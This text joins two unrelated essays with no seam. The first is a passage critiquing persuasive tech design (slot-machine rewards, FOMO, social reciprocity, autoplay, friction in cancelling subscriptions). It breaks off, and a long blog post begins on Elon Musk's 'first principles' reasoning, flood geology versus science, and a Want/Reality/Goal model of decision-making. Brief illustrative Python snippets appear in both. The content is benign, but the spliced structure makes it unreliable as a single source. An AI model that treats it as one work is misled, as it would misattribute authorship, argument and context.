One major reason why is the #1 psychological ingredient in slot machines: intermittent variable rewards.
If you want to maximize addictiveness, all tech designers need to do is link a user’s action (like pulling a lever) with a variable reward. You pull a lever and immediately receive either an enticing reward (a match, a prize!) or nothing. Addictiveness is maximized when the rate of reward is most variable.
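As a toy illustration of that mechanic (my own invention, not any real app's code): the action never changes, but the payoff arrives unpredictably.

```python
# Toy illustration of an intermittent variable reward schedule:
# the action is always the same, the payoff is unpredictable.
import random

def pull_to_refresh() -> int:
    """Sometimes there is something new; usually there is nothing."""
    if random.random() < 0.3:           # reward arrives unpredictably
        return random.randint(1, 5)     # and in unpredictable amounts
    return 0

for pull in range(10):
    print(f"pull {pull}: {pull_to_refresh()} new notifications")
```

Most pulls pay out nothing, which is exactly what keeps the next pull tempting.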
Does this effect really work on people? Yes. Slot machines make more money in the United States than baseball, movies, and theme parks combined. Relative to other kinds of gambling, people get ‘problematically involved’ with slot machines 3–4x faster according to NYU professor Natasha Dow Schull, author of Addiction by Design.
But here’s the unfortunate truth — several billion people have a slot machine in their pocket:
When we pull our phone out of our pocket, we’re playing a slot machine to see what notifications we got.
When we pull to refresh our email, we’re playing a slot machine to see what new email we got.
When we swipe down our finger to scroll the Instagram feed, we’re playing a slot machine to see what photo comes next.
When we swipe faces left/right on dating apps like Tinder, we’re playing a slot machine to see if we got a match.
When we tap the # of red notifications, we’re playing a slot machine to see what’s underneath.
Apps and websites sprinkle intermittent variable rewards all over their products because it’s good for business.
But in other cases, slot machines emerge by accident. For example, there is no malicious corporation behind all of email who consciously chose to make it a slot machine. No one profits when millions check their email and nothing’s there. Neither did Apple and Google’s designers want phones to work like slot machines. It emerged by accident.
But now companies like Apple and Google have a responsibility to reduce these effects by converting intermittent variable rewards into less addictive, more predictable ones with better design. For example, they could empower people to set predictable times during the day or week for when they want to check “slot machine” apps, and correspondingly adjust when new messages are delivered to align with those times.
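A minimal sketch of that alternative, with made-up delivery times and no real messaging API, might look like this:

```python
# Sketch of the batching idea: hold incoming messages in a queue and
# release them only at delivery times the user chose in advance.
# Times and data structures are invented for illustration.
from datetime import datetime, time

DELIVERY_WINDOWS = [time(8, 0), time(12, 30), time(18, 0)]  # user-chosen
queue = []

def receive(message: str) -> None:
    """Buffer an incoming message instead of interrupting immediately."""
    queue.append(message)

def deliver_if_scheduled(now: datetime) -> list:
    """Hand over the whole batch only when a chosen window arrives."""
    if any((now.hour, now.minute) == (w.hour, w.minute) for w in DELIVERY_WINDOWS):
        batch = list(queue)
        queue.clear()
        return batch
    return []

receive("New email from work")
receive("Someone liked your photo")
print(deliver_if_scheduled(datetime(2016, 11, 12, 12, 30)))  # whole batch at 12:30
print(deliver_if_scheduled(datetime(2016, 11, 12, 15, 0)))   # nothing in between
```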
Hijack #3: Fear of Missing Something Important (FOMSI)
Another way apps and websites hijack people’s minds is by inducing a “1% chance you could be missing something important.”
If I convince you that I’m a channel for important information, messages, friendships, or potential sexual opportunities — it will be hard for you to turn me off, unsubscribe, or remove your account — because (aha, I win) you might miss something important:
This keeps us subscribed to newsletters even after they haven’t delivered recent benefits (“what if I miss a future announcement?”)
This keeps us “friended” to people with whom we haven’t spoken in ages (“what if I miss something important from them?”)
This keeps us swiping faces on dating apps, even when we haven’t even met up with anyone in a while (“what if I miss that one hot match who likes me?”)
This keeps us using social media (“what if I miss that important news story or fall behind what my friends are talking about?”)
But if we zoom into that fear, we’ll discover that it’s unbounded: we’ll always miss something important at any point when we stop using something.
There are magic moments on Facebook we’ll miss by not using it for the 6th hour (e.g. an old friend who’s visiting town right now).
There are magic moments we’ll miss on Tinder (e.g. our dream romantic partner) by not swiping our 700th match.
There are emergency phone calls we’ll miss if we’re not connected 24/7.
But living moment to moment with the fear of missing something isn’t how we’re built to live.
And it’s amazing how quickly, once we let go of that fear, we wake up from the illusion. When we unplug for more than a day, unsubscribe from those notifications, or go to Camp Grounded — the concerns we thought we’d have don’t actually happen.
We don’t miss what we don’t see.
The thought, “what if I miss something important?” is generated in advance of unplugging, unsubscribing, or turning off — not after. Imagine if tech companies recognized that, and helped us proactively tune our relationships with friends and businesses in terms of what we define as “time well spent” for our lives, instead of in terms of what we might miss.
Hijack #4: Social Approval
Easily one of the most persuasive things a human being can receive.
We’re all vulnerable to social approval. The need to belong, to be approved or appreciated by our peers is among the highest human motivations. But now our social approval is in the hands of tech companies.
When I get tagged by my friend Marc, I imagine him making a conscious choice to tag me. But I don’t see how a company like Facebook orchestrated his doing that in the first place.
Facebook, Instagram or SnapChat can manipulate how often people get tagged in photos by automatically suggesting all the faces people should tag (e.g. by showing a box with a 1-click confirmation, “Tag Tristan in this photo?”).
So when Marc tags me, he’s actually responding to Facebook’s suggestion, not making an independent choice. But through design choices like this, Facebook controls the multiplier for how often millions of people experience their social approval on the line.
Facebook uses automatic suggestions like this to get people to tag more people, creating more social externalities and interruptions.
The same happens when we change our main profile photo — Facebook knows that’s a moment when we’re vulnerable to social approval: “what do my friends think of my new pic?” Facebook can rank this higher in the news feed, so it sticks around for longer and more friends will like or comment on it. Each time they like or comment on it, we’ll get pulled right back.
Everyone innately responds to social approval, but some demographics (teenagers) are more vulnerable to it than others. That’s why it’s so important to recognize how powerful designers are when they exploit this vulnerability.
Hijack #5: Social Reciprocity (Tit-for-tat)
You do me a favor — I owe you one next time.
You say, “thank you”— I have to say “you’re welcome.”
You send me an email— it’s rude not to get back to you.
You follow me — it’s rude not to follow you back. (especially for teenagers)
We are vulnerable to needing to reciprocate others’ gestures. But as with Social Approval, tech companies now manipulate how often we experience it.
In some cases, it’s by accident. Email, texting and messaging apps are social reciprocity factories. But in other cases, companies exploit this vulnerability on purpose.
LinkedIn is the most obvious offender. LinkedIn wants as many people creating social obligations for each other as possible, because each time they reciprocate (by accepting a connection, responding to a message, or endorsing someone back for a skill) they have to come back to linkedin.com where they can get people to spend more time.
Like Facebook, LinkedIn exploits an asymmetry in perception. When you receive an invitation from someone to connect, you imagine that person making a conscious choice to invite you, when in reality, they likely unconsciously responded to LinkedIn’s list of suggested contacts. In other words, LinkedIn turns your unconscious impulses (to “add” a person) into new social obligations that millions of people feel obligated to repay. All while they profit from the time people spend doing it.
Imagine millions of people getting interrupted like this throughout their day, running around like chickens with their heads cut off, reciprocating each other — all designed by companies who profit from it.
Welcome to social media.
After accepting an endorsement, LinkedIn takes advantage of your bias to reciprocate by offering four additional people for you to endorse in return.
Imagine if technology companies had a responsibility to minimize social reciprocity. Or if there was an independent organization that represented the public’s interests — an industry consortium or an FDA for tech — that monitored when technology companies abused these biases?
Hijack #6: Bottomless bowls, Infinite Feeds, and Autoplay
YouTube autoplays the next video after a countdown
Another way to hijack people is to keep them consuming things, even when they aren’t hungry anymore.
How? Easy. Take an experience that was bounded and finite, and turn it into a bottomless flow that keeps going.
Cornell professor Brian Wansink demonstrated this in his study showing you can trick people into eating more soup by giving them a bottomless bowl that automatically refills as they eat. With bottomless bowls, people eat 73% more calories than those with normal bowls and underestimate how many calories they ate by 140 calories.
Tech companies exploit the same principle. News feeds are purposely designed to auto-refill with reasons to keep you scrolling, and purposely eliminate any reason for you to pause, reconsider or leave.
It’s also why video and social media sites like Netflix, YouTube or Facebook autoplay the next video after a countdown instead of waiting for you to make a conscious choice (in case you won’t). A huge portion of traffic on these websites is driven by autoplaying the next thing.
Facebook autoplays the next video after a countdown
Tech companies often claim that “we’re just making it easier for users to see the video they want to watch” when they are actually serving their business interests. And you can’t blame them, because increasing “time spent” is the currency they compete for.
Instead, imagine if technology companies empowered you to consciously bound your experience to align with what would be “time well spent” for you. Not just bounding the quantity of time you spend, but the qualities of what would be “time well spent.”
Hijack #7: Instant Interruption vs. “Respectful” Delivery
Companies know that messages that interrupt people immediately are more persuasive at getting people to respond than messages delivered asynchronously (like email or any deferred inbox).
Given the choice, Facebook Messenger (or WhatsApp, WeChat or SnapChat for that matter) would prefer to design their messaging system to interrupt recipients immediately (and show a chat box) instead of helping users respect each other’s attention.
In other words, interruption is good for business.
It’s also in their interest to heighten the feeling of urgency and social reciprocity. For example, Facebook automatically tells the sender when you “saw” their message, instead of letting you avoid disclosing whether you read it (“now that you know I’ve seen the message, I feel even more obligated to respond.”)
By contrast, Apple more respectfully lets users toggle “Read Receipts” on or off.
The problem is, maximizing interruptions in the name of business creates a tragedy of the commons, ruining global attention spans and causing billions of unnecessary interruptions each day. This is a huge problem we need to fix with shared design standards (potentially, as part of Time Well Spent).
Hijack #8: Bundling Your Reasons with Their Reasons
Another way apps hijack you is by taking your reasons for visiting the app (to perform a task) and making them inseparable from the app’s business reasons (maximizing how much we consume once we’re there).
For example, in the physical world of grocery stores, the #1 and #2 most popular reasons to visit are pharmacy refills and buying milk. But grocery stores want to maximize how much people buy, so they put the pharmacy and the milk at the back of the store.
In other words, they make the thing customers want (milk, pharmacy) inseparable from what the business wants. If stores were truly organized to support people, they would put the most popular items in the front.
Tech companies design their websites the same way. For example, when you want to look up a Facebook event happening tonight (your reason), the Facebook app doesn’t allow you to access it without first landing on the news feed (their reasons), and that’s on purpose. Facebook wants to convert every reason you have for using Facebook into their reason, which is to maximize the time you spend consuming things.
Instead, imagine if …
Twitter gave you a separate way to post a Tweet without having to see their news feed.
Facebook gave you a separate way to look up Facebook Events going on tonight, without being forced to use their news feed.
Facebook gave you a separate way to use Facebook Connect as a passport for creating new accounts on 3rd party apps and websites, without being forced to install Facebook’s entire app, news feed and notifications.
In a Time Well Spent world, there is always a direct way to get what you want separately from what businesses want. Imagine a digital “bill of rights” outlining design standards that forced the products used by billions of people to let them navigate directly to what they want without needing to go through intentionally placed distractions.
Imagine if web browsers empowered you to navigate directly to what you want — especially for sites that intentionally detour you toward their reasons.
Hijack #9: Inconvenient Choices
We’re told that it’s enough for businesses to “make choices available.”
“If you don’t like it you can always use a different product.”
“If you don’t like it, you can always unsubscribe.”
“If you’re addicted to our app, you can always uninstall it from your phone.”
Businesses naturally want to make the choices they want you to make easier, and the choices they don’t want you to make harder. Magicians do the same thing. You make it easier for a spectator to pick the thing you want them to pick, and harder to pick the thing you don’t.
For example, NYTimes.com lets you “make a free choice” to cancel your digital subscription. But instead of just doing it when you hit “Cancel Subscription,” they send you an email with information on how to cancel your account by calling a phone number that’s only open at certain times.
NYTimes claims it’s giving a free choice to cancel your account
Instead of viewing the world in terms of availability of choices, we should view the world in terms of friction required to enact choices. Imagine a world where choices were labeled with how difficult they were to fulfill (like coefficients of friction) and there was an independent entity — an industry consortium or non-profit — that labeled these difficulties and set standards for how easy navigation should be.
Hijack #10: Forecasting Errors, “Foot in the Door” strategies
Facebook promises an easy choice to “See Photo.” Would we still click if it gave the true price tag?
Lastly, apps can exploit people’s inability to forecast the consequences of a click.
People don’t intuitively forecast the true cost of a click when it’s presented to them. Sales people use “foot in the door” techniques by asking for a small innocuous request to begin with (“just one click to see which tweet got retweeted”) and escalate from there (“why don’t you stay awhile?”). Virtually all engagement websites use this trick.
Imagine if web browsers and smartphones, the gateways through which people make these choices, were truly watching out for people and helped them forecast the consequences of clicks, based on real data about the benefits and costs each click actually had.
That’s why I add “Estimated reading time” to the top of my posts. When you put the “true cost” of a choice in front of people, you’re treating your users or audience with dignity and respect. In a Time Well Spent internet, choices could be framed in terms of projected cost and benefit, so people were empowered to make informed choices by default, not by doing extra work.
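To see how cheap that kind of label is to produce, here is a minimal sketch (illustrative code, not from the post), assuming an average reading speed of roughly 200 words per minute:

```python
import math

def estimated_reading_time(text: str, words_per_minute: int = 200) -> int:
    """Rough 'true cost' label for a post: word count divided by an assumed
    average reading speed, rounded up to whole minutes."""
    word_count = len(text.split())
    return max(1, math.ceil(word_count / words_per_minute))

# A 3,000-word post comes out to about 15 minutes at 200 words per minute.
print(estimated_reading_time("word " * 3000))  # -> 15
```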
TripAdvisor uses a “foot in the door” technique by asking for a single click review (“How many stars?”) while hiding the three page survey of questions behind the click.
Summary And How We Can Fix This
Are you upset that technology hijacks your agency? I am too. I’ve listed a few techniques but there are literally thousands. Imagine whole bookshelves, seminars, workshops and trainings that teach aspiring tech entrepreneurs techniques like these. Imagine hundreds of engineers whose job every day is to invent new ways to keep you hooked.
The ultimate freedom is a free mind, and we need technology that’s on our team to help us live, feel, think and act freely.
We need our smartphones, notification screens and web browsers to be exoskeletons for our minds and interpersonal relationships that put our values, not our impulses, first. People’s time is valuable. And we should protect it with the same rigor as privacy and other digital rights.
Welcome to the last post in the series on the world of Elon Musk.
It’s been a long one, I know. A long series with long posts and a long time between posts. It turns out that when it comes to Musk and his shit, there was a lot to say.
Anyone who’s read the first three posts in this series is aware that I’ve not only been buried in the things Musk is doing, I’ve been drinking a tall glass of the Elon Musk Kool-Aid throughout. I’m very, very into it.
I kind of feel like that’s fine, right? The dude is a steel-bending industrial giant in America in a time when there aren’t supposed to be steel-bending industrial giants in America, igniting revolutions in huge, old industries that aren’t supposed to be revolutionable. After emerging from the 1990s dotcom party with $180 million, instead of sitting back in his investor chair listening to pitches from groveling young entrepreneurs, he decided to start a brawl with a group of 900-pound sumo wrestlers—the auto industry, the oil industry, the aerospace industry, the military-industrial complex, the energy utilities—and he might actually be winning. And all of this, it really seems, for the purpose of giving our species a better future.
Pretty Kool-Aid worthy. But someone being exceptionally rad isn’t Kool-Aid worthy enough to warrant 90,000 words over a string of months on a blog that’s supposed to be about a wide range of topics.
During the first post, I laid out the two objectives for the series:
1) To understand why Musk is doing what he’s doing.
2) To understand why Musk is able to do what he’s doing.
So far, we’ve spent most of the time exploring objective #1. But what really intrigued me as I began thinking about this was objective #2. I’m fascinated by those rare people in history who manage to dramatically change the world during their short time here, and I’ve always liked to study those people and read their biographies. Those people know something the rest of us don’t, and we can learn something valuable from them. Getting access to Elon Musk gave me what I decided was an unusual chance to get my hands on one of those people and examine them up close. If it were just Musk’s money or intelligence or ambition or good intentions that made him so capable, there would be more Elon Musks out there. No, it’s something else—what TED curator Chris Anderson called Musk’s “secret sauce”—and for me, this series became a mission to figure it out.
The good news is, after a lot of time thinking about this, reading about this, and talking to him and his staff, I think I’ve got it. What for a while was a large pile of facts, observations, and sound bites eventually began to congeal into a common theme—a trait in Musk that I believe he shares with many of the most dynamic icons in history and that separates him from almost everybody else.
As I worked through the Tesla and SpaceX posts, this concept kept surfacing, and it became clear to me that this series couldn’t end without a deep dive into exactly what it is that Musk and a few others do so unusually well. The thing that tantalized me is that this secret sauce is actually accessible to everyone and right there in front of us—if we can just wrap our heads around it. Mulling this all over has legitimately affected the way I think about my life, my future, and the choices I make—and I’m going to try my best in this post to explain why.
Two Kinds of Geology
In 1681, English theologian Thomas Burnet published Sacred Theory of the Earth, in which he explained how geology worked. What happened was, around 6,000 years ago, the Earth was formed as a perfect sphere with a surface of idyllic land and a watery interior. But then, when the surface dried up a little later, cracks formed in its surface, releasing much of the water from within. The result was the Biblical Deluge and Noah having to deal with a ton of shit all week. Once things settled down, the Earth was no longer a perfect sphere—all the commotion had distorted the surface, bringing about mountains and valleys and caves down below, and the whole thing was littered with the fossils of the flood’s victims.
And bingo. Burnet had figured it out. The great puzzle of fundamental theology had been to reconcile the large number of seemingly-very-old Earth features with the much shorter timeline of the Earth detailed in the Bible. For theologians of the time, it was their version of the general relativity vs. quantum mechanics quandary, and Burnet had come up with a viable string theory to unify it all under one roof.
It wasn’t just Burnet. There were enough theories kicking around reconciling geology with the verses of the Bible to warrant a 15,000-word “Flood Geology” Wikipedia page today.
Around the same time, another group of thinkers started working on the geology puzzle: scientists.
For the theologian puzzlers, the starting rules of the game were, “Fact: the Earth began 6,000 years ago and there was at one point an Earth-sweeping flood,” and their puzzling took place strictly within that context. But the scientists started the game with no rules at all. The puzzle was a blank slate where any observations and measurements they found were welcome.
Over the next 300 years, the scientists built theory upon theory, and as new technologies brought in new types of measurements, old theories were debunked and replaced with new updated versions. The science community kept surprising themselves as the apparent age of the Earth grew longer and longer. In 1907, there was a huge breakthrough when American scientist Bertram Boltwood pioneered the technique of deciphering the age of rocks through radiometric dating, which found elements in a rock with a known rate of radioactive decay and measured what portion of those elements remained intact and what portion had already converted to decay substance.
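To make the technique concrete, here is a rough sketch of the underlying arithmetic (illustrative code, not from the post), assuming you know an isotope’s half-life and can measure what fraction of the parent isotope is still intact:

```python
import math

def radiometric_age(remaining_fraction: float, half_life_years: float) -> float:
    """Age implied by how much of a parent isotope is left, given its half-life.
    Assumes none of the decay product was present when the rock formed."""
    return half_life_years * math.log2(1.0 / remaining_fraction)

# Uranium-238 has a half-life of roughly 4.47 billion years, so a rock in which
# only half of the original U-238 remains would be about 4.47 billion years old.
print(radiometric_age(0.5, 4.47e9))
```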
Radiometric dating blew Earth’s history backwards into the billions of years, which burst open new breakthroughs in science like the theory of Continental Drift, which in turn led to the theory of Plate Tectonics. The scientists were on a roll.
Meanwhile, the flood geologists would have none of it. To them, any conclusions from the science community were moot because they were breaking the rules of the game to begin with. The Earth was officially less than 6,000 years old, so if radiometric dating showed otherwise, it was a flawed technique, period.
But the scientific evidence grew increasingly compelling, and as time wore on, more and more flood geologists threw in the towel and accepted the scientists’ viewpoint—maybe they had had the rules of the game wrong.
Some, though, held strong. The rules were the rules, and it didn’t matter how many people agreed that the Earth was billions of years old—it was a grand conspiracy.
Today, there are still many flood geologists making their case. Just recently, an author named Tom Vail wrote a book called Grand Canyon: A Different View, in which he explains:
Contrary to what is widely believed, radioactive dating has not proven the rocks of the Grand Canyon to be millions of years old. The vast majority of the sedimentary layers in the Grand Canyon were deposited as the result of a global flood that occurred after and as a result of the initial sin that took place in the Garden of Eden.
If the website analytics stats on Chartbeat included a “Type of Geologist” demographic metric, I imagine that for Wait But Why readers, the breakdown would look something like this:
[Chart: Geology Breakdown]
It makes sense. Whether religious or not, most people who read this site are big on data, evidence, and accuracy. I’m reminded of this every time I make an error in a post.
Whatever role faith plays in the spiritual realm, what most of us agree on is that when seeking answers to our questions about the age of the Earth, the history of our species, the causes of lightning, or any other physical phenomenon in the universe, data and logic are far more effective tools than faith and scripture.
And yet—after thinking about this for a while, I’ve come to an unpleasant conclusion:
When it comes to most of the way we think, the way we make decisions, and the way we live our lives, we’re much more like the flood geologists than the science geologists.
And Elon’s secret? He’s a scientist through and through.
Hardware and Software
The first clue to the way Musk thinks is in the super odd way that he talks. For example:
Human child: “I’m scared of the dark, because that’s when all the scary shit is gonna get me and I won’t be able to see it coming.”
Elon: “When I was a little kid, I was really scared of the dark. But then I came to understand, dark just means the absence of photons in the visible wavelength—400 to 700 nanometers. Then I thought, well it’s really silly to be afraid of a lack of photons. Then I wasn’t afraid of the dark anymore after that.”2
Or:
Human father: “I’d like to start working less because my kids are starting to grow up.”
Elon: “I’m trying to throttle back, because particularly the triplets are starting to gain consciousness. They’re almost two.”3
Or:
Human single man: “I’d like to find a girlfriend. I don’t want to be so busy with work that I have no time for dating.”
Elon: “I would like to allocate more time to dating, though. I need to find a girlfriend. That’s why I need to carve out just a little more time. I think maybe even another five to 10 — how much time does a woman want a week? Maybe 10 hours? That’s kind of the minimum? I don’t know.”4
I call this MuskSpeak. MuskSpeak is a language that describes everyday parts of life as exactly what they actually, literally are.
There are plenty of technical situations where we all agree that MuskSpeak makes much more sense than normal human parlance—
[Image: Heart Surgery]
—but what makes Musk odd is that he thinks about most things in MuskSpeak, including many areas where you don’t usually find it. Like when I asked him if he was afraid of death, and he said having kids made him more comfortable with dying, because “kids sort of are a bit you. At least they’re half you. They’re half you at the hardware level, and depending on how much time you have with them, they’re that percentage of you at the software level.”
When you or I look at kids, we see small, dumb, cute people. When Musk looks at his five kids, he sees five of his favorite computers. When he looks at you, he sees a computer. And when he looks in the mirror, he sees a computer—his computer. It’s not that Musk suggests that people are just computers—it’s that he sees people as computers on top of whatever else they are.
And at the most literal level, Elon’s right about people being computers. At its simplest definition, a computer is an object that can store and process data—which the brain certainly is.
And while this isn’t the most poetic way to think about our minds, I’m starting to believe that it’s one of those areas of life where MuskSpeak can serve us well—because thinking of a brain as a computer forces us to consider the distinction between our hardware and our software, a distinction we often fail to recognize.
For a computer, hardware is defined as “the machines, wiring, and other physical components of a computer.” So for a human, that’s the physical brain they were born with and all of its capabilities, which determines their raw intelligence, their innate talents, and other natural strengths and shortcomings.
A computer’s software is defined as “the programs and other operating information used by a computer.” For a human, that’s what they know and how they think—their belief systems, thought patterns, and reasoning methods. Life is a flood of incoming data of all kinds that enter the brain through our senses, and it’s the software that assesses and filters all that input, processes and organizes it, and ultimately uses it to generate the key output—a decision.
The hardware is a ball of clay that’s handed to us when we’re born. And of course, not all clay is equal—each brain begins as a unique combination of strengths and weaknesses across a wide range of processes and capabilities.
But it’s the software that determines what kind of tool the clay gets shaped into.
When people think about what makes someone like Elon Musk so effective, they often focus on the hardware—and Musk’s hardware has some pretty impressive specs. But the more I learn about Musk and other people who seem to have superhuman powers—whether it be Steve Jobs, Albert Einstein, Henry Ford, Genghis Khan, Marie Curie, John Lennon, Ayn Rand, or Louis C.K.—the more I’m convinced that it’s their software, not their natural-born intelligence or talents, that makes them so rare and so effective.
So let’s talk about software—starting with Musk’s. As I wrote the other three posts in this series, I looked at everything I was learning about Musk—the things he says, the decisions he makes, the missions he takes on and how he approaches them—as clues to how his underlying software works.
Eventually, the clues piled up and the shape of the software began to reveal itself. Here’s what I think it looks like:
Elon’s Software
The structure of Musk’s software starts like many of ours, with what we’ll call the Want box:
[Diagram: the Want box]
This box contains anything in life where you want Situation A to turn into Situation B. Situation A is currently what’s happening and you want something to change so that Situation B is what’s happening instead. Some examples:
[Image: example Wants]
Next, the Want box has a partner in crime—what we’ll call the Reality box. It contains all things that are possible:
[Diagram: the Reality box]
Pretty straightforward.
The overlap of the Want and Reality boxes is the Goal Pool, where your goal options live:2
[Diagram: the Goal Pool]
So you pick a goal from the pool—the thing you’re going to try to move from Point A to Point B.
And how do you cause something to change? You direct your power towards it. A person’s power can come in various forms: your time, your energy (mental and physical), your resources, your persuasive ability, your connection to others, etc.
The concept of employment is just Person A using their resources power (a paycheck) to direct Person B’s time and/or energy power toward Person A’s goal. When Oprah publicly recommends a book, that’s combining her abundant power of connection (she has a huge reach) and her abundant power of persuasion (people trust her) and directing them towards the goal of getting the book into the hands of thousands of people who would have otherwise never known about it.
Once a goal has been selected, you know the direction in which to point your power. Now it’s time to figure out the most effective way to use that power to generate the outcome you want—that’s your strategy:
[Diagram: the Strategy box]
Simple right? And probably not that different from how you think.
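As a toy sketch of that structure (purely illustrative; the wants, possibilities, and selection rule below are made up, not Musk’s), you could model the boxes as sets and the Goal Pool as their overlap:

```python
# Purely illustrative: the boxes as sets, the Goal Pool as their overlap.
want_box = {"help humanity's future", "work on cutting-edge tech", "become a concert pianist"}
reality_box = {"work on cutting-edge tech", "help humanity's future", "start an internet company"}

goal_pool = want_box & reality_box   # only things you both want and can actually do
goal = sorted(goal_pool)[0]          # stand-in for weighing the options and picking one

strategy = "point time, energy, and resources at: " + goal
print(goal_pool)
print(strategy)
```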
But what makes Musk’s software so effective isn’t its structure, it’s that he uses it like a scientist. Carl Sagan said, “Science is a way of thinking much more than it is a body of knowledge,” and you can see Musk apply that way of thinking in two key ways:
1) He builds each software component himself, from the ground up.
Musk calls this “reasoning from first principles.” I’ll let him explain:
I think generally people’s thinking process is too bound by convention or analogy to prior experiences. It’s rare that people try to think of something on a first principles basis. They’ll say, “We’ll do that because it’s always been done that way.” Or they’ll not do it because “Well, nobody’s ever done that, so it must not be good.” But that’s just a ridiculous way to think. You have to build up the reasoning from the ground up—“from the first principles” is the phrase that’s used in physics. You look at the fundamentals and construct your reasoning from that, and then you see if you have a conclusion that works or doesn’t work, and it may or may not be different from what people have done in the past.
In science, this means starting with what evidence shows us to be true. A scientist doesn’t say, “Well we know the Earth is flat because that’s the way it looks, that’s what’s intuitive, and that’s what everyone agrees is true,” a scientist says, “The part of the Earth that I can see at any given time appears to be flat, which would be the case when looking at a small piece of many differently shaped objects up close, so I don’t have enough information to know what the shape of the Earth is. One reasonable hypothesis is that the Earth is flat, but until we have tools and techniques that can be used to prove or disprove that hypothesis, it is an open question.”
A scientist gathers together only what he or she knows to be true—the first principles—and uses those as the puzzle pieces with which to construct a conclusion.
Reasoning from first principles is a hard thing to do in life, and Musk is a master at it. Brain software has four major decision-making centers:
1) Filling in the Want box
2) Filling in the Reality box
3) Goal selection from the Goal Pool
4) Strategy formation
Musk works through each of these boxes by reasoning from first principles. Filling in the Want box from first principles requires a deep, honest, and independent understanding of yourself. Filling in the Reality box requires the clearest possible picture of the actual facts of both the world and your own abilities. The Goal Pool should double as a Goal Selection Laboratory that contains tools for intelligently measuring and weighing options. And strategies should be formed based on what you know, not on what is typically done.
2) He continually adjusts each component’s conclusions as new information comes in.
You might remember doing proofs in geometry class, one of the most mundane parts of everyone’s childhood. These ones:
Given: A = B
Given: B = C + D
Therefore: A = C + D
Math is satisfyingly exact. Its givens are exact and its conclusions are airtight.
In math, we call givens “axioms,” and axioms are 100% true. So when we build conclusions out of axioms, we call them “proofs,” which are also 100% true.
Science doesn’t have axioms or proofs, for good reason.
We could have called Newton’s law of universal gravitation a proof—and for a long time, it certainly seemed like one—but then what happens when Einstein comes around and shows that Newton was actually “zoomed in,” like someone calling the Earth flat, and when you zoom way out, you discover that the real law is general relativity and Newton’s law actually stops working under extreme conditions, while general relativity works no matter what. So then, you’d call general relativity a proof instead. Except then what happens when quantum mechanics comes around and shows that general relativity fails to apply on a tiny scale and that a new set of laws is needed to account for those cases.
There are no axioms or proofs in science because nothing is for sure and everything we feel sure about might be disproven. Richard Feynman has said, “Scientific knowledge is a body of statements of varying degrees of certainty—some most unsure, some nearly sure, none absolutely certain.” Instead of proofs, science has theories. Theories are based on hard evidence and treated as truths, but at all times they’re susceptible to being adjusted or disproven as new data emerges.
So in science, it’s more like:
Given (for now): A = B
Given (for now): B = C + D
Therefore (for now): A = C + D
In our lives, the only true axiom is “I exist.” Beyond that, nothing is for sure. And for most things in life, we can’t even build a real scientific theory because life doesn’t tend to have exact measurements.
Usually, the best we can do is a strong hunch based on what data we have. And in science, a hunch is called a hypothesis. Which works like this:
Given (it seems, based on what I know): A = B
Given (it seems, based on what I know): B = C + D
Therefore (it seems, based on what I know): A = C + D
Hypotheses are built to be tested. Testing a hypothesis can disprove it or strengthen it, and if it passes enough tests, it can be upgraded to a theory.
So after Musk builds his conclusions from first principles, what does he do? He tests the shit out of them, continually, and adjusts them regularly based on what he learns. Let’s go through the whole process to show how:
You begin by reasoning from first principles to A) fill in the Want box, B) fill in the Reality box, C) select a goal from the pool, and D) build a strategy—and then you get to work. You’ve used first principles thinking to decide where to point your power and the most effective way to use it.
But the goal-achievement strategy you came up with was just your first crack. It was a hypothesis, ripe for testing. You test a strategy hypothesis one way: action. You pour your power into the strategy and see what happens. As you do this, data starts flowing in—results, feedback, and new information from the outside world. Certain parts of your strategy hypothesis might be strengthened by this new data, others might be weakened, and new ideas may have sprung to life in your head through the experience—but either way, some adjustment is usually called for:
[Diagram: the Strategy loop]
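Read as pseudocode, that loop might look something like this rough sketch, where the “world” and the adjustment rule are stand-ins invented purely for illustration:

```python
# Toy illustration of "strategy as hypothesis": act, observe, adjust, repeat.
def act(strategy: float) -> float:
    """Stand-in for the real world: returns how far the outcome missed the goal.
    Here the (hidden) ideal strategy happens to be 42."""
    return 42.0 - strategy

def strategy_loop(initial_strategy: float, rounds: int = 20) -> float:
    strategy = initial_strategy
    for _ in range(rounds):
        feedback = act(strategy)     # results and new information flow in
        strategy += 0.5 * feedback   # adjust the hypothesis instead of starting over
    return strategy

print(strategy_loop(0.0))  # drifts toward 42 as the loop spins
```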
As this strategy loop spins and your power becomes more and more effective at accomplishing your goal, other things are happening down below.
For someone reasoning from first principles, the Want box at any given time is a snapshot of their innermost desires the last time they thought hard about it. But the contents of the Want box are also a hypothesis, and experience can show you that you were wrong about something you thought you wanted or that you want something you didn’t realize you did. At the same time, the inner you isn’t a statue—it’s a shifting, morphing sculpture whose innermost values change as time passes. So even if something in the Want box was correct at one point, as you change, it may lose its place in the box. The Want box should serve the current inner you as well as possible, which requires you to update it, something you do through reflection:
[Diagram: the Want loop]
A rotating Want loop is called evolution.
On the other side of the aisle, the Reality box is also going through a process. “Things that are possible” is a hypothesis, maybe more so than anything else. It takes into account both the state of the world and your own abilities. And as your own abilities change and grow, the world changes even faster. What was possible in the world in 2005 is very different from what’s possible today, and it’s a huge (and rare) advantage to be working with an up-to-date Reality box.
Filling in your Reality box from first principles is a great challenge, and keeping the box current so that it matches actual reality takes continual work.
[Diagram: the Reality loop]
For each of these areas, the box represents the current hypothesis and the circle represents the source of new information that can be used to adjust the hypothesis.
In the science world, the circle is truth, which scientists access by mining for new information in laboratories, studies, and experiments.
[Diagram: the Science loop]
New information-mining is happening all the time and hypotheses and theories are in turn being revised regularly.
In life, it’s our duty to remember that the circles are the boss, not the boxes—the boxes are only trying their best to do the circles proud. And if we fall out of touch with what’s happening in the circles, the info in the boxes becomes obsolete and a less effective source for our decision-making.
Thinking about the software as a whole, let’s take a step back. What we see is a goal formation mechanism below and a goal attainment mechanism above. One thing goal attainment often requires is laser focus. To get the results we want, we zoom in on the micro picture, sinking our teeth into our goal and homing in on it with our strategy loop.
But as time passes, the Want box and Reality box adjust contents and morph shape, and eventually, something else can happen—the Goal Pool changes.
The Goal Pool is just the overlap of the Want and Reality boxes, so its own shape and contents are totally dependent on the state of those boxes. And as you live your life inside the goal attainment mechanism above, it’s important to make sure that what you’re working so hard on remains in line with the Goal Pool below—so let’s add in two big red arrows for that:
[Diagram: the full software]
Checking in with the large circle down below requires us to lift our heads up from the micro mission and do some macro reflection. And when enough changes happen in the Want and Reality boxes that the goal you’re pursuing is no longer in the goal pool, it calls for a macro life change—a breakup, a job switch, a relocation, a priority swap, an attitude shift.
